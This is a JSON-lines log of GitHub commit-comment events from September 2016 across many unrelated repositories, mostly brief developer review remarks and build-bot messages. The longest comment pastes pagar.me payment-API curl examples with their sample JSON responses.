{"id":"4632170035","type":"CommitCommentEvent","actor":{"login":"llington"},"repo":{"name":"llington/API-Paga-me"},"payload":{"comment":{"id":19211251,"position":null,"line":null,"path":null,"commit_id":"d5f670015d13aa1be9a29b4cf9e5464bf65d3ed6","created_at":"2016-09-28T17:27:41Z","updated_at":"2016-09-28T17:27:41Z","body":"``curl -X POST 'https://api.pagar.me/1/transactions' \\\r\n    -d 'api_key=ak_test_grXijQ4GicOa2BLGZrDRTR5qNQxJW0' \\\r\n    -d 'amount=1000' \\\r\n    -d 'card_hash={CARD_HASH}' \\\r\n    -d 'postback_url=http://seusite.com/payments/2718' \\\r\n    -d 'split_rules[0][recipient_id]=re_ci7nhf1ay0007n016wd5t22nl'\r\n    -d 'split_rules[0][charge_processing_fee]=true' \\\r\n    -d 'split_rules[0][liable]=true' \\\r\n    -d 'split_rules[0][percentage]=30' \\\r\n    -d 'split_rules[1][recipient_id]=re_ci7nheu0m0006n016o5sglg9t' \\\r\n    -d 'split_rules[1][charge_processing_fee]=true' \\\r\n    -d 'split_rules[1][liable]=false' \\\r\n    -d 'split_rules[1][percentage]=70'\r\n\r\n{\r\n  \"object\": \"transaction\",\r\n  \"status\": \"processing\",\r\n  \"refuse_reason\": null,\r\n  \"status_reason\": \"acquirer\",\r\n  \"acquirer_response_code\": null,\r\n  \"authorization_code\": null,\r\n  \"soft_descriptor\": \"API-paga-me\",\r\n  \"tid\": null,\r\n  \"nsu\": null,\r\n  \"date_created\": \"2015-02-25T21:54:56.000Z\",\r\n  \"date_updated\": \"2015-02-25T21:54:56.000Z\",\r\n  \"amount\": 310000,\r\n  \"installments\": 5,\r\n  \"id\": 184220,\r\n  \"cost\": 0,\r\n  \"postback_url\": \"http://requestb.in/pkt7pgpk\",\r\n  \"payment_method\": \"credit_card\",\r\n  \"antifraud_score\": null,\r\n  \"boleto_url\": null,\r\n  \"boleto_barcode\": null,\r\n  \"boleto_expiration_date\": null,\r\n  \"referer\": \"api_key\",\r\n  \"ip\": \"189.8.94.42\",\r\n  \"subscription_id\": null,\r\n  \"phone\": null,\r\n  \"address\": null,\r\n  \"customer\": null,\r\n  \"card\": {\r\n    \"object\": \"card\",\r\n    \"id\": \"card_ci6l9fx8f0042rt16rtb477gj\",\r\n    \"date_created\": \"2015-02-25T21:54:56.000Z\",\r\n    \"date_updated\": \"2015-02-25T21:54:56.000Z\",\r\n    \"brand\": \"mastercard\",\r\n    \"holder_name\": \"Api Customer\",\r\n    \"first_digits\": \"548045\",\r\n    \"last_digits\": \"3123\",\r\n    \"fingerprint\": \"HSiLJan2nqwn\",\r\n    \"valid\": null\r\n  },\r\n  \"metadata\": {\r\n    \"idccount\": \"58054\"\r\n  }\r\n}\r\ncurl -X POST https://api.pagar.me/1/recipients \\\r\n-d 'api_key=ak_test_grXijQ4GicOa2BLGZrDRTR5qNQxJW0' \\\r\n-d 'transfer_interval=weekly' \\\r\n-d 'transfer_day=5' \\\r\n-d 'transfer_enabled=true' \\\r\n-d 'bank_account_id=4841'\r\n{\r\n    \"object\": \"recipient\",\r\n    \"id\": \"re_ci9bucss300h1zt6dvywufeqc\",\r\n    \"bank_account\": {\r\n        \"object\": \"bank_account\",\r\n        \"id\": 4841,\r\n        \"bank_code\": \"341\",\r\n        \"agencia\": \"0932\",\r\n        \"agencia_dv\": \"5\",\r\n        \"conta\": \"58054\",\r\n        \"conta_dv\": \"1\",\r\n        \"document_type\": \"cpf\",\r\n        \"document_number\": \"26268738888\",\r\n        \"legal_name\": \"API BANK ACCOUNT\",\r\n        \"charge_transfer_fees\": false,\r\n        \"date_created\": \"2016-08-19T15:40:51.000Z\"\r\n    },\r\n    \"transfer_enabled\": true,\r\n    \"last_transfer\": null,\r\n    \"transfer_interval\": \"weekly\",\r\n    \"transfer_day\": 5,\r\n    \"automatic_anticipation_enabled\": true,\r\n    \"anticipatable_volume_percentage\": 85,\r\n    \"date_created\": \"2015-05-05T21:59:48.000Z\",\r\n    \"date_updated\": \"2015-05-06T22:51:48.000Z\"\r\n}\r\n\r\ncurl -X POST https://api.pagar.me/2/recipients \\\r\n-d 'api_key=ak_test_grXijQ4GicOa2BLGZrDRTR5qNQxJW1' \\\r\n-d 'transfer_interval=weekly' \\\r\n-d 'transfer_day=12' \\\r\n-d 'transfer_enabled=true' \\\r\n-d 'bank_account_id=4855'\r\n\r\n{\r\n    \"object\": \"recipient\",\r\n    \"id\": \"re_ci9bucss300h1zt6dvywufeqc\",\r\n    \"bank_account\": {\r\n        \"object\": \"bank_account\",\r\n        \"id\": 4855,\r\n        \"bank_code\": \"341\",\r\n        \"agencia\": \"0932\",\r\n        \"agencia_dv\": \"5\",\r\n        \"conta\": \"58054\",\r\n        \"conta_dv\": \"1\",\r\n        \"document_type\": \"cpf\",\r\n        \"document_number\": \"26268738888\",\r\n        \"legal_name\": \"API BANK ACCOUNT\",\r\n        \"charge_transfer_fees\": false,\r\n        \"date_created\": \"2016-03-21T12:40:51.000Z\"\r\n    },\r\n    \"transfer_enabled\": true,\r\n    \"last_transfer\": null,\r\n    \"transfer_interval\": \"weekly\",\r\n    \"transfer_day\": 12,\r\n    \"automatic_anticipation_enabled\": true,\r\n    \"anticipatable_volume_percentage\": 85,\r\n    \"date_created\": \"2016-03-21T20:43:48.000Z\",\r\n    \"date_updated\": \"2016-03-21T21:50:48.000Z\"\r\n}\r\n\r\n\r\n\r\n\r\n[{\r\n    \"object\": \"payable\",\r\n    \"id\": 1485,\r\n    \"status\": \"paid\",\r\n    \"amount\": 39000,\r\n    \"fee\": 115,\r\n    \"installment\": null,\r\n    \"transaction_id\": 192669,\r\n    \"split_rule_id\": \"sr_ci87hce8o00083016bkniqems\",\r\n    \"payment_date\": \"2015-04-07T03:00:00.000Z\",\r\n    \"type\": \"credit\",\r\n    \"payment_method\": \"boleto\",\r\n    \"date_created\": \"2015-04-07T15:47:48.000Z\"\r\n}, {\r\n    \"object\": \"payable\",\r\n    \"id\": 1486,\r\n    \"status\": \"paid\",\r\n    \"amount\": 91000,\r\n    \"fee\": 0,\r\n    \"installment\": null,\r\n    \"transaction_id\": 192669,\r\n    \"split_rule_id\": \"sr_ci87hce8o00093016fin8p6ll\",\r\n    \"payment_date\": \"2015-04-07T03:00:00.000Z\",\r\n    \"type\": \"credit\",\r\n    \"payment_method\": \"boleto\",\r\n    \"date_created\": \"2015-04-07T15:47:48.000Z\"\r\n}]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-28T17:27:41Z"}
{"id":"4632170422","type":"CommitCommentEvent","actor":{"login":"DavidEGrayson"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":19211254,"position":9,"line":13,"path":"app/assets/javascripts/discourse/lib/url.js.es6","commit_id":"8871c9852c874070911ccb67c22e43a0c45ad91e","created_at":"2016-09-28T17:27:45Z","updated_at":"2016-09-28T17:27:45Z","body":"Thanks for the update.  Still, it looks like thise whitelisting approach won't support arbitrary static files.  For example if someone wanted to server a file at `https://discourse.example.com/code_of_conduct.txt` and then link to it from forum posts, it would not work.\r\n"}},"created_at":"2016-09-28T17:27:45Z"}
{"id":"4632170773","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19211255,"position":null,"line":null,"path":null,"commit_id":"238b61c80357e4c23cfbc8c032b80736165c12ea","created_at":"2016-09-28T17:27:48Z","updated_at":"2016-09-28T17:27:48Z","body":"MakeWebKitWork (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-238b61c80357e4c23cfbc8c032b80736165c12ea-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-238b61c80357e4c23cfbc8c032b80736165c12ea-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T17:27:48Z"}
{"id":"4632176098","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/compsci631"},"payload":{"comment":{"id":19211267,"position":null,"line":null,"path":null,"commit_id":"f3acb46d3793faeddcf86759430300b9ebc24d36","created_at":"2016-09-28T17:28:46Z","updated_at":"2016-09-28T17:28:46Z","body":"thanks!"}},"created_at":"2016-09-28T17:28:46Z"}
{"id":"4632177419","type":"CommitCommentEvent","actor":{"login":"m-wynn"},"repo":{"name":"utdlug/lug_config"},"payload":{"comment":{"id":19211272,"position":2,"line":2,"path":"group_vars/workstation.yml","commit_id":"526e5bbccc0b5505eda2511d65338f268c9479e7","created_at":"2016-09-28T17:29:00Z","updated_at":"2016-09-28T17:29:00Z","body":"ACCPET"}},"created_at":"2016-09-28T17:29:00Z"}
{"id":"4632177793","type":"CommitCommentEvent","actor":{"login":"sdaftuar"},"repo":{"name":"sdaftuar/bitcoin"},"payload":{"comment":{"id":19211274,"position":5,"line":5288,"path":"src/main.cpp","commit_id":"d990722b56f02f3272c49eeef4c952992bd9efaa","created_at":"2016-09-28T17:29:04Z","updated_at":"2016-09-28T17:29:04Z","body":"I think this is fixed now in https://github.com/bitcoin/bitcoin/commit/3c908aa44b06e0c66c815a068549f890b09df3bd.\r\n\r\nThis does highlight though that I never wrote a test to verify that we don't request compact blocks from non-sendcmpct peers.  Sigh!"}},"created_at":"2016-09-28T17:29:04Z"}
{"id":"4632177826","type":"CommitCommentEvent","actor":{"login":"arjunguha"},"repo":{"name":"plasma-umass/compsci631"},"payload":{"comment":{"id":19211275,"position":null,"line":null,"path":null,"commit_id":"b639c880dc01dd7b4de2b897705c4028da2602a5","created_at":"2016-09-28T17:29:04Z","updated_at":"2016-09-28T17:29:04Z","body":"Whoops, thanks!"}},"created_at":"2016-09-28T17:29:04Z"}
{"id":"4632182485","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19211290,"position":null,"line":null,"path":null,"commit_id":"0701c4ea3cfde905d7de6b6c81a079a8d8a5eaf4","created_at":"2016-09-28T17:29:54Z","updated_at":"2016-09-28T17:29:54Z","body":"@yeputons "}},"created_at":"2016-09-28T17:29:54Z"}
{"id":"4632183387","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19211293,"position":null,"line":null,"path":null,"commit_id":"8803d28f444b7826f3827fcd61c4c59e17055dc7","created_at":"2016-09-28T17:30:03Z","updated_at":"2016-09-28T17:30:03Z","body":"@yeputons "}},"created_at":"2016-09-28T17:30:03Z"}
{"id":"4632184417","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19211297,"position":null,"line":null,"path":null,"commit_id":"238b61c80357e4c23cfbc8c032b80736165c12ea","created_at":"2016-09-28T17:30:14Z","updated_at":"2016-09-28T17:30:14Z","body":"MakeWebKitWork (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-238b61c80357e4c23cfbc8c032b80736165c12ea-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-238b61c80357e4c23cfbc8c032b80736165c12ea-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T17:30:14Z"}
{"id":"4632186563","type":"CommitCommentEvent","actor":{"login":"moacirmoda"},"repo":{"name":"institutotim/timtec"},"payload":{"comment":{"id":19211299,"position":null,"line":null,"path":null,"commit_id":"c2d86c7574042c69c4c932e2d78c6552607c35e8","created_at":"2016-09-28T17:30:34Z","updated_at":"2016-09-28T17:30:34Z","body":"> \"No tema timtec, arrumar layout do cadastro inicial e fazer as mesmas correções de ordem dos campos. \"\r\n\r\n\r\n@brunosmartin eu comentei uma função no commit c2d86c7 que não entendi qual sua função, porém corrigiu o bug do footer sobrepor o cadastro, nos dois temas, pelo menos no desktop. Você sabe do que se trata?"}},"created_at":"2016-09-28T17:30:34Z"}
{"id":"4632190400","type":"CommitCommentEvent","actor":{"login":"apattno"},"repo":{"name":"apattno/DFD"},"payload":{"comment":{"id":19211314,"position":null,"line":null,"path":null,"commit_id":"dcfbe3cf19deff86e338021ff5645b04d237b749","created_at":"2016-09-28T17:31:16Z","updated_at":"2016-09-28T17:31:16Z","body":"![image](https://cloud.githubusercontent.com/assets/21365184/18924854/4bd8a204-8577-11e6-953c-e7907e972196.png)\r\n"}},"created_at":"2016-09-28T17:31:16Z"}
{"id":"4632190975","type":"CommitCommentEvent","actor":{"login":"gjs1985"},"repo":{"name":"hannonhill/Example-Sites"},"payload":{"comment":{"id":19211317,"position":null,"line":null,"path":null,"commit_id":"7def9bc9cbf6133052e8db175dab331a07cecfe5","created_at":"2016-09-28T17:31:21Z","updated_at":"2016-09-28T17:31:21Z","body":"I moved it over to an issue.  I can delete this thread.  \r\n\r\nYes, I meant the markers.  Right now, I just want to see the example live to show to a colleague."}},"created_at":"2016-09-28T17:31:21Z"}
{"id":"4632193176","type":"CommitCommentEvent","actor":{"login":"Sumukh"},"repo":{"name":"Cal-CS-61A-Staff/ok-client"},"payload":{"comment":{"id":19211327,"position":25,"line":32,"path":"client/protocols/backup.py","commit_id":"5b33333099f825e8ecf24b585ba78e4d9a771da9","created_at":"2016-09-28T17:31:44Z","updated_at":"2016-09-28T17:31:44Z","body":"If I remember correctly `import` don't enter the global scope. \r\n\r\n```\r\ndef sample():\r\n    import pprint \r\n    pprint.pprint(\"local\")\r\n    \r\nsample()\r\npprint.pprint(\"global\")\r\n```\r\n```\r\n'local'\r\nTraceback (most recent call last):\r\n  File \"Untitled.py\", line 6, in <module>\r\n    pprint.pprint(\"global\")\r\nNameError: name 'pprint' is not defined\r\n```\r\n\r\n`send_all_messages` uses the ssl module - so it'll have to be imported there."}},"created_at":"2016-09-28T17:31:44Z"}
{"id":"4632193320","type":"CommitCommentEvent","actor":{"login":"cdmayer"},"repo":{"name":"OneDrive/onedrive-sdk-csharp"},"payload":{"comment":{"id":19211329,"position":23,"line":23,"path":"src/OneDriveSdk/Requests/Generated/ISharedWithMeCollectionPage.cs","commit_id":"eb576161e872ebe1eada0c327d6864e75e3148bd","created_at":"2016-09-28T17:31:45Z","updated_at":"2016-09-28T17:31:45Z","body":"Probably just a lot of copy/paste. Eventually this WILL be generated, although this iteration was not. I think it's fine how it is."}},"created_at":"2016-09-28T17:31:45Z"}
{"id":"4632200814","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19211355,"position":135,"line":135,"path":"it/mozorg/newsletters.lang","commit_id":"3a302258f6dd8bfe17692d3a02d30f6c0369b506","created_at":"2016-09-28T17:33:03Z","updated_at":"2016-09-28T17:33:03Z","body":"Giusto per capire: stai seguendo la bugmail su gialloporpora@mozit? Perché ti avevo messo in CC al bug https://bugzilla.mozilla.org/show_bug.cgi?id=1305778"}},"created_at":"2016-09-28T17:33:03Z"}
{"id":"4632204193","type":"CommitCommentEvent","actor":{"login":"DanielSkala"},"repo":{"name":"kagali11/Pills_Plan"},"payload":{"comment":{"id":19211364,"position":132,"line":132,"path":"app/src/main/java/revolware/pillsplan/DatabaseHandler.java","commit_id":"3410b4d96fe9c9252b1e4a8801a0d059a9866981","created_at":"2016-09-28T17:33:38Z","updated_at":"2016-09-28T17:33:38Z","body":"ale tam to uz tak aj je spravene pokial dobre pozeram :) noo nevadi, akoze\nto teraz akutne netreba, hlavne treba predizajnovat tu mainactivity tak aby\nnazov lieku bol velky a ostatne veci ako tlacitka a switche male\n\n2016-09-28 19:25 GMT+02:00 Peter Grajcar <notifications@github.com>:\n\n> je to DatabaseHandler class\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kagali11/Pills_Plan/commit/3410b4d96fe9c9252b1e4a8801a0d059a9866981#commitcomment-19211219>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARHwfGDKo-gu5OWIkzIl6auBW3dIVK4_ks5quqMQgaJpZM4KJFdI>\n> .\n>\n"}},"created_at":"2016-09-28T17:33:38Z"}
{"id":"4632216010","type":"CommitCommentEvent","actor":{"login":"idris"},"repo":{"name":"r0b1n/rnrf-relay-renderer"},"payload":{"comment":{"id":19211404,"position":5,"line":50,"path":"src/RelayComponentRenderer.js","commit_id":"9560a7cd99cae4bd5be7d683619c8572882225f6","created_at":"2016-09-28T17:35:46Z","updated_at":"2016-09-28T17:35:46Z","body":"Okee doke 👍 "}},"created_at":"2016-09-28T17:35:46Z"}
{"id":"4632217909","type":"CommitCommentEvent","actor":{"login":"fred777"},"repo":{"name":"CyanogenMod/android_kernel_motorola_omap4-common"},"payload":{"comment":{"id":19211409,"position":null,"line":null,"path":null,"commit_id":"3c2e7737e24a4b1a49367ff991c5458fc4bc4d3f","created_at":"2016-09-28T17:36:08Z","updated_at":"2016-09-28T17:36:08Z","body":"I think I just created a better memory management by incorporating some LMK optimizations/backports from other devices: http://forum.xda-developers.com/showpost.php?p=68896598&postcount=2\r\n\r\nBut before pushing a change request to gerrit, I'd like to know how to change the default LMK watermarks because I'm sure they can be lowered with the new kernel... Do you know where they are defined? \r\n\r\nAlso, I'm not sure about CONFIG_ANDROID_LOW_MEMORY_KILLER_AUTODETECT_OOM_ADJ_VALUES - I have it disabled currently. What do you think about this?"}},"created_at":"2016-09-28T17:36:08Z"}
{"id":"4632217911","type":"CommitCommentEvent","actor":{"login":"peter-grajcar-13"},"repo":{"name":"kagali11/Pills_Plan"},"payload":{"comment":{"id":19211410,"position":132,"line":132,"path":"app/src/main/java/revolware/pillsplan/DatabaseHandler.java","commit_id":"3410b4d96fe9c9252b1e4a8801a0d059a9866981","created_at":"2016-09-28T17:36:08Z","updated_at":"2016-09-28T17:36:08Z","body":"jasné, ja len do budúcna som sem dal comment aby sa nezabudlo :)"}},"created_at":"2016-09-28T17:36:08Z"}
{"id":"4632223669","type":"CommitCommentEvent","actor":{"login":"vavalos4816"},"repo":{"name":"vavalos4816/miproyecto"},"payload":{"comment":{"id":19211432,"position":null,"line":null,"path":null,"commit_id":"0b74a20d97e664447ef8c4b44c717b543f53b9e3","created_at":"2016-09-28T17:37:10Z","updated_at":"2016-09-28T17:37:10Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Tarjeta 1.1](https://trello.com/c/OgKkiqEA/1-tarjeta-1-1)"}},"created_at":"2016-09-28T17:37:10Z"}
{"id":"4632225275","type":"CommitCommentEvent","actor":{"login":"fmalcher"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19211438,"position":null,"line":null,"path":null,"commit_id":"ee2ccbcf26da873e33a32cbb8414718d8c1791b9","created_at":"2016-09-28T17:37:27Z","updated_at":"2016-09-28T17:37:27Z","body":"@JohannesHoppe Du hast an einigen Stellen Selektoren entfernt, oder?"}},"created_at":"2016-09-28T17:37:27Z"}
{"id":"4632226424","type":"CommitCommentEvent","actor":{"login":"DanielSkala"},"repo":{"name":"kagali11/Pills_Plan"},"payload":{"comment":{"id":19211440,"position":132,"line":132,"path":"app/src/main/java/revolware/pillsplan/DatabaseHandler.java","commit_id":"3410b4d96fe9c9252b1e4a8801a0d059a9866981","created_at":"2016-09-28T17:37:38Z","updated_at":"2016-09-28T17:37:38Z","body":"jasne, kludne, dikki ;)\n\n2016-09-28 19:36 GMT+02:00 Peter Grajcar <notifications@github.com>:\n\n> jasné, ja len do budúcna som sem dal comment aby sa nezabudlo :)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kagali11/Pills_Plan/commit/3410b4d96fe9c9252b1e4a8801a0d059a9866981#commitcomment-19211410>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARHwfGbfa-zbYRr1QwDRTwAW7UDSc-wwks5quqWIgaJpZM4KJFdI>\n> .\n>\n"}},"created_at":"2016-09-28T17:37:38Z"}
{"id":"4632226607","type":"CommitCommentEvent","actor":{"login":"caesarsol"},"repo":{"name":"mbostock/topojson"},"payload":{"comment":{"id":19211442,"position":null,"line":null,"path":null,"commit_id":"6770d3c7d41594d17865b3bebfed3a9d2b09e0e8","created_at":"2016-09-28T17:37:41Z","updated_at":"2016-09-28T17:37:41Z","body":"Well, you could always publish an alternative default import in 1.6.28... \r\n\r\nThat would not corrupt any integrity. And you could deprecate it if you want to be strict."}},"created_at":"2016-09-28T17:37:41Z"}
{"id":"4632228856","type":"CommitCommentEvent","actor":{"login":"TheRealVira"},"repo":{"name":"TheRealVira/BugReproduction"},"payload":{"comment":{"id":19211447,"position":47,"line":31,"path":"BugReproduction/Content/Shader/P2.fx","commit_id":"a265605a7c12dd588651796edc40b72aeb0bc2cd","created_at":"2016-09-28T17:38:00Z","updated_at":"2016-09-28T17:38:00Z","body":"Okay thanks there! I'll try my best in the next days. 😊"}},"created_at":"2016-09-28T17:38:00Z"}
{"id":"4632232385","type":"CommitCommentEvent","actor":{"login":"raoc999"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19211452,"position":null,"line":null,"path":null,"commit_id":"baaa428d3aa45ef6d0de2ce0947322d322cd7f69","created_at":"2016-09-28T17:38:31Z","updated_at":"2016-09-28T17:38:31Z","body":"But we are using \"%100\" format not using \"100%\" style.  Exam: %10 pil kaldı! "}},"created_at":"2016-09-28T17:38:31Z"}
{"id":"4632244844","type":"CommitCommentEvent","actor":{"login":"v4hn"},"repo":{"name":"Jntzko/tams_ur5_pick_place"},"payload":{"comment":{"id":19211483,"position":36,"line":36,"path":"src/plan_grasps_service.cpp","commit_id":"b0fb01c7c6af6d745448a4267b4041b22b6397c2","created_at":"2016-09-28T17:40:39Z","updated_at":"2016-09-28T17:40:39Z","body":"```\r\nfrom tf import transformations\r\ntransformations.euler_from_quaternion([.5, .5, -.5, .5])\r\n```\r\nyields (1.5707963267948968, 1.5707963267948963, 0.0)\r\n\r\nSo please replace this block by\r\n```\r\npose.pose.orientation = tf::createQuaternionMsgFromRollPitchYaw(M_PI/2, M_PI/2, 0.0)\r\n```\r\n(also in the other code after testing...)"}},"created_at":"2016-09-28T17:40:39Z"}
{"id":"4632245512","type":"CommitCommentEvent","actor":{"login":"KrzysztofCwalina"},"repo":{"name":"dotnet/corefxlab"},"payload":{"comment":{"id":19211486,"position":null,"line":null,"path":null,"commit_id":"292ea78eecb4b6ec7cc35d7e4c59a010cf59fd54","created_at":"2016-09-28T17:40:46Z","updated_at":"2016-09-28T17:40:46Z","body":"Actually, GetEnumerator cannot be an extension. I will add GetEnumerator bask to the interface as otherwise it's quite clunky to use it."}},"created_at":"2016-09-28T17:40:46Z"}
{"id":"4632248081","type":"CommitCommentEvent","actor":{"login":"vavalos4816"},"repo":{"name":"vavalos4816/miproyecto"},"payload":{"comment":{"id":19211498,"position":null,"line":null,"path":null,"commit_id":"e95a043765232dd6d634fd4fd04557c86cbc6fec","created_at":"2016-09-28T17:41:15Z","updated_at":"2016-09-28T17:41:15Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Tarjeta 1.1](https://trello.com/c/OgKkiqEA/1-tarjeta-1-1)"}},"created_at":"2016-09-28T17:41:15Z"}
{"id":"4632254402","type":"CommitCommentEvent","actor":{"login":"addaleax"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19211517,"position":null,"line":null,"path":null,"commit_id":"7f7502d901e8eb9db5213121a6b0a9d4f825d23c","created_at":"2016-09-28T17:42:21Z","updated_at":"2016-09-28T17:42:21Z","body":"Commit #15000 \\o/"}},"created_at":"2016-09-28T17:42:21Z"}
{"id":"4632259134","type":"CommitCommentEvent","actor":{"login":"raoc999"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19211536,"position":null,"line":null,"path":null,"commit_id":"9d2da976c89842f014211ae64b792c7dc88f9614","created_at":"2016-09-28T17:43:09Z","updated_at":"2016-09-28T17:43:09Z","body":"Last time you are changed MiuiSystemUI file. But we are using \"%100\" format\nnot using \"100%\" style. Exam: %10 pil kaldı!\n\nrecep.ali.orhan.cakmak\n\n2016-09-28 12:46 GMT+03:00 ingbrzy <notifications@github.com>:\n\n> you just waste your time by translating these useless apks..\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ingbrzy/MA-XML-8.0-TURKISH/commit/9d2da976c89842f014211ae64b792c7dc88f9614#commitcomment-19204845>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AP5Puzrl2aQxFVqGshbmqy1pkKJCa9yEks5qujdrgaJpZM4KInj0>\n> .\n>\n"}},"created_at":"2016-09-28T17:43:09Z"}
{"id":"4632260767","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"ingbrzy/MA-XML-8.0-TURKISH"},"payload":{"comment":{"id":19211539,"position":null,"line":null,"path":null,"commit_id":"baaa428d3aa45ef6d0de2ce0947322d322cd7f69","created_at":"2016-09-28T17:43:26Z","updated_at":"2016-09-28T17:43:26Z","body":"lol.. weird country..."}},"created_at":"2016-09-28T17:43:26Z"}
{"id":"4632262061","type":"CommitCommentEvent","actor":{"login":"dalehenrich"},"repo":{"name":"dalehenrich/filetree"},"payload":{"comment":{"id":19211545,"position":null,"line":null,"path":null,"commit_id":"262b0288b113bca0b3aff1bee005d87916c0c1ff","created_at":"2016-09-28T17:43:41Z","updated_at":"2016-09-28T17:43:41Z","body":"Not sure what you mean by `slipstream`? A pull request would be best, because we then ensure that the tests pass before publishing. The cached squeak images for travis should be updated with the bugfix along with including the `Metacello-Cypress` package ... "}},"created_at":"2016-09-28T17:43:41Z"}
{"id":"4632265788","type":"CommitCommentEvent","actor":{"login":"JohannesHoppe"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19211557,"position":null,"line":null,"path":null,"commit_id":"ee2ccbcf26da873e33a32cbb8414718d8c1791b9","created_at":"2016-09-28T17:44:22Z","updated_at":"2016-09-28T17:44:22Z","body":"Klar. Braucht man nicht. Weil Router."}},"created_at":"2016-09-28T17:44:22Z"}
{"id":"4632266987","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19211564,"position":null,"line":null,"path":null,"commit_id":"a4549d52ff218872faf43f8d20d6f447ecf7941c","created_at":"2016-09-28T17:44:35Z","updated_at":"2016-09-28T17:44:35Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=12)"}},"created_at":"2016-09-28T17:44:35Z"}
{"id":"4632267014","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19211565,"position":null,"line":null,"path":null,"commit_id":"a4549d52ff218872faf43f8d20d6f447ecf7941c","created_at":"2016-09-28T17:44:36Z","updated_at":"2016-09-28T17:44:36Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=122)"}},"created_at":"2016-09-28T17:44:36Z"}
{"id":"4632268650","type":"CommitCommentEvent","actor":{"login":"JohannesHoppe"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19211568,"position":null,"line":null,"path":null,"commit_id":"ee2ccbcf26da873e33a32cbb8414718d8c1791b9","created_at":"2016-09-28T17:44:54Z","updated_at":"2016-09-28T17:44:54Z","body":"Konkret: book-details"}},"created_at":"2016-09-28T17:44:54Z"}
{"id":"4632270718","type":"CommitCommentEvent","actor":{"login":"ramapcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19211573,"position":null,"line":null,"path":null,"commit_id":"fd58ee62890b8c7e468c92a16aa51728908da49d","created_at":"2016-09-28T17:45:15Z","updated_at":"2016-09-28T17:45:15Z","body":"Go ahead @gregory38. As long as it's functionally the same, it's fine.\r\nThe ring buffer should exist in the hardware though and we should aim to emulate that correctly."}},"created_at":"2016-09-28T17:45:15Z"}
{"id":"4632271123","type":"CommitCommentEvent","actor":{"login":"rexim"},"repo":{"name":"morganey-lang/Morganey"},"payload":{"comment":{"id":19211574,"position":null,"line":null,"path":null,"commit_id":"38defbbbb79aacb0f482967e3894acb2c46279f8","created_at":"2016-09-28T17:45:19Z","updated_at":"2016-09-28T17:45:19Z","body":"ADD IT!1!\r\n\r\n*sorry, don't know why I wrote commit message in caps* :D"}},"created_at":"2016-09-28T17:45:19Z"}
{"id":"4632273314","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19211582,"position":null,"line":null,"path":null,"commit_id":"62ad711f607b8efff240199337f172d737e667f7","created_at":"2016-09-28T17:45:44Z","updated_at":"2016-09-28T17:45:44Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=124)"}},"created_at":"2016-09-28T17:45:44Z"}
